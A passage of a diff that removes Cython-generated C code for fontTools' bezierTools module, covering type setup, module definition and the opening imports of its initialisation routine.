__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)) __PYX_ERR(0, 637, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)) __PYX_ERR(0, 763, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)) __PYX_ERR(0, 1245, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) < 0) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) < 0) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)) __PYX_ERR(0, 1306, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)) __PYX_ERR(0, 1459, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) < 0) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) < 0) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - __Pyx_RefNannyFinishContext(); - return 0; - __pyx_L1_error:; - __Pyx_RefNannyFinishContext(); - return -1; -} - -static int __Pyx_modinit_type_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); - /*--- Type import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_variable_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); - /*--- Variable import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_function_import_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); - /*--- Function import code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - - -#if PY_MAJOR_VERSION >= 3 -#if CYTHON_PEP489_MULTI_PHASE_INIT -static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ -static int __pyx_pymod_exec_bezierTools(PyObject* module); /*proto*/ -static PyModuleDef_Slot __pyx_moduledef_slots[] = { - {Py_mod_create, (void*)__pyx_pymod_create}, - {Py_mod_exec, (void*)__pyx_pymod_exec_bezierTools}, - {0, NULL} -}; -#endif - -#ifdef __cplusplus -namespace { - struct PyModuleDef __pyx_moduledef = - #else - static struct PyModuleDef __pyx_moduledef = - #endif - { - PyModuleDef_HEAD_INIT, - "bezierTools", - __pyx_k_fontTools_misc_bezierTools_py_to, /* m_doc */ - #if CYTHON_PEP489_MULTI_PHASE_INIT - 0, /* m_size */ - #elif CYTHON_USE_MODULE_STATE - sizeof(__pyx_mstate), /* m_size */ - #else - -1, /* m_size */ - #endif - __pyx_methods /* m_methods */, - #if CYTHON_PEP489_MULTI_PHASE_INIT - __pyx_moduledef_slots, /* m_slots */ - #else - NULL, /* m_reload */ - #endif - #if CYTHON_USE_MODULE_STATE - __pyx_m_traverse, /* m_traverse */ - __pyx_m_clear, /* m_clear */ - NULL /* m_free */ - #else - NULL, /* m_traverse */ - NULL, /* m_clear */ - NULL /* m_free */ - #endif - }; - #ifdef __cplusplus -} /* anonymous namespace */ -#endif -#endif - -#ifndef CYTHON_NO_PYINIT_EXPORT -#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC -#elif PY_MAJOR_VERSION < 3 -#ifdef __cplusplus -#define __Pyx_PyMODINIT_FUNC extern "C" void -#else -#define __Pyx_PyMODINIT_FUNC void -#endif -#else -#ifdef __cplusplus -#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * -#else -#define __Pyx_PyMODINIT_FUNC PyObject * -#endif -#endif - - -#if PY_MAJOR_VERSION < 3 -__Pyx_PyMODINIT_FUNC initbezierTools(void) CYTHON_SMALL_CODE; /*proto*/ -__Pyx_PyMODINIT_FUNC initbezierTools(void) -#else -__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void) CYTHON_SMALL_CODE; /*proto*/ -__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void) -#if CYTHON_PEP489_MULTI_PHASE_INIT -{ - return PyModuleDef_Init(&__pyx_moduledef); -} -static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { - #if PY_VERSION_HEX >= 0x030700A1 - static PY_INT64_T main_interpreter_id = -1; - PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); - if (main_interpreter_id == -1) { - main_interpreter_id = current_id; - return (unlikely(current_id == -1)) ? -1 : 0; - } else if (unlikely(main_interpreter_id != current_id)) - #else - static PyInterpreterState *main_interpreter = NULL; - PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; - if (!main_interpreter) { - main_interpreter = current_interpreter; - } else if (unlikely(main_interpreter != current_interpreter)) - #endif - { - PyErr_SetString( - PyExc_ImportError, - "Interpreter change detected - this module can only be loaded into one interpreter per process."); - return -1; - } - return 0; -} -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) -#else -static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) -#endif -{ - PyObject *value = PyObject_GetAttrString(spec, from_name); - int result = 0; - if (likely(value)) { - if (allow_none || value != Py_None) { -#if CYTHON_COMPILING_IN_LIMITED_API - result = PyModule_AddObject(module, to_name, value); -#else - result = PyDict_SetItemString(moddict, to_name, value); -#endif - } - Py_DECREF(value); - } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { - PyErr_Clear(); - } else { - result = -1; - } - return result; -} -static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { - PyObject *module = NULL, *moddict, *modname; - CYTHON_UNUSED_VAR(def); - if (__Pyx_check_single_interpreter()) - return NULL; - if (__pyx_m) - return __Pyx_NewRef(__pyx_m); - modname = PyObject_GetAttrString(spec, "name"); - if (unlikely(!modname)) goto bad; - module = PyModule_NewObject(modname); - Py_DECREF(modname); - if (unlikely(!module)) goto bad; -#if CYTHON_COMPILING_IN_LIMITED_API - moddict = module; -#else - moddict = PyModule_GetDict(module); - if (unlikely(!moddict)) goto bad; -#endif - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; - if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; - return module; -bad: - Py_XDECREF(module); - return NULL; -} - - -static CYTHON_SMALL_CODE int __pyx_pymod_exec_bezierTools(PyObject *__pyx_pyinit_module) -#endif -#endif -{ - int stringtab_initialized = 0; - #if CYTHON_USE_MODULE_STATE - int pystate_addmodule_run = 0; - #endif - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - #if CYTHON_PEP489_MULTI_PHASE_INIT - if (__pyx_m) { - if (__pyx_m == __pyx_pyinit_module) return 0; - PyErr_SetString(PyExc_RuntimeError, "Module 'bezierTools' has already been imported. Re-initialisation is not supported."); - return -1; - } - #elif PY_MAJOR_VERSION >= 3 - if (__pyx_m) return __Pyx_NewRef(__pyx_m); - #endif - /*--- Module creation code ---*/ - #if CYTHON_PEP489_MULTI_PHASE_INIT - __pyx_m = __pyx_pyinit_module; - Py_INCREF(__pyx_m); - #else - #if PY_MAJOR_VERSION < 3 - __pyx_m = Py_InitModule4("bezierTools", __pyx_methods, __pyx_k_fontTools_misc_bezierTools_py_to, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); - if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) - #elif CYTHON_USE_MODULE_STATE - __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) - { - int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); - __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to bezierTools pseudovariable */ - if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - pystate_addmodule_run = 1; - } - #else - __pyx_m = PyModule_Create(&__pyx_moduledef); - if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #endif - CYTHON_UNUSED_VAR(__pyx_t_1); - __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_d); - __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_b); - __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) - Py_INCREF(__pyx_cython_runtime); - if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #if CYTHON_REFNANNY -__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); -if (!__Pyx_RefNanny) { - PyErr_Clear(); - __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); - if (!__Pyx_RefNanny) - Py_FatalError("failed to import 'refnanny' module"); -} -#endif - __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_bezierTools(void)", 0); - if (__Pyx_check_binary_version(__PYX_LIMITED_VERSION_HEX, __Pyx_get_runtime_version(), CYTHON_COMPILING_IN_LIMITED_API) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #ifdef __Pxy_PyFrame_Initialize_Offsets - __Pxy_PyFrame_Initialize_Offsets(); - #endif - __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) - #ifdef __Pyx_CyFunction_USED - if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_FusedFunction_USED - if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_Coroutine_USED - if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_Generator_USED - if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - #ifdef __Pyx_StopAsyncIteration_USED - if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - /*--- Library function declarations ---*/ - /*--- Threads initialization code ---*/ - #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS - PyEval_InitThreads(); - #endif - /*--- Initialize various global constants etc. ---*/ - if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - stringtab_initialized = 1; - if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) - if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - if (__pyx_module_is_main_fontTools__misc__bezierTools) { - if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - } - #if PY_MAJOR_VERSION >= 3 - { - PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) - if (!PyDict_GetItemString(modules, "fontTools.misc.bezierTools")) { - if (unlikely((PyDict_SetItemString(modules, "fontTools.misc.bezierTools", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - } - } - #endif - /*--- Builtin init code ---*/ - if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - /*--- Constants init code ---*/ - if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - /*--- Global type/function init code ---*/ - (void)__Pyx_modinit_global_init_code(); - (void)__Pyx_modinit_variable_export_code(); - (void)__Pyx_modinit_function_export_code(); - if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) - (void)__Pyx_modinit_type_import_code(); - (void)__Pyx_modinit_variable_import_code(); - (void)__Pyx_modinit_function_import_code(); - /*--- Execution code ---*/ - #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) - if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) - #endif - - /* "fontTools/misc/bezierTools.py":5 - * """ - * - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea # <<<<<<<<<<<<<< - * from fontTools.misc.transform import Identity - * import math - */ - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_s_calcBounds); - __Pyx_GIVEREF(__pyx_n_s_calcBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_calcBounds)) __PYX_ERR(0, 5, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_sectRect); - __Pyx_GIVEREF(__pyx_n_s_sectRect); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_s_sectRect)) __PYX_ERR(0, 5, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_rectArea); - __Pyx_GIVEREF(__pyx_n_s_rectArea); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_s_rectArea)) __PYX_ERR(0, 5, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_fontTools_misc_arrayTools, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcBounds, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_sectRect); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_sectRect, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_rectArea, __pyx_t_2) < 0) __PYX_ERR(0, 5, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":6 - * - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea - * from fontTools.misc.transform import Identity # <<<<<<<<<<<<<< - * import math - * from collections import namedtuple - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_n_s_Identity); - __Pyx_GIVEREF(__pyx_n_s_Identity); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_Identity)) __PYX_ERR(0, 6, __pyx_L1_error); - __pyx_t_2 = __Pyx_Import(__pyx_n_s_fontTools_misc_transform, __pyx_t_3, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_2, __pyx_n_s_Identity); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_Identity, __pyx_t_3) < 0) __PYX_ERR(0, 6, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":7 - * from fontTools.misc.arrayTools import calcBounds, sectRect, rectArea - * from fontTools.misc.transform import Identity - * import math # <<<<<<<<<<<<<< - * from collections import namedtuple - * - */ - __pyx_t_2 = __Pyx_ImportDottedModule(__pyx_n_s_math, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 7, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_math, __pyx_t_2) < 0) __PYX_ERR(0, 7, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":8 - * from fontTools.misc.transform import Identity - * import math - * from collections import namedtuple # <<<<<<<<<<<<<< - * - * try: - */ - __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_s_namedtuple); - __Pyx_GIVEREF(__pyx_n_s_namedtuple); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_namedtuple)) __PYX_ERR(0, 8, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_collections, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_namedtuple); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_namedtuple, __pyx_t_2) < 0) __PYX_ERR(0, 8, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_4, &__pyx_t_5); - __Pyx_XGOTREF(__pyx_t_1); - __Pyx_XGOTREF(__pyx_t_4); - __Pyx_XGOTREF(__pyx_t_5); - /*try:*/ { - - /* "fontTools/misc/bezierTools.py":13 - * import cython - * - * COMPILED = cython.compiled # 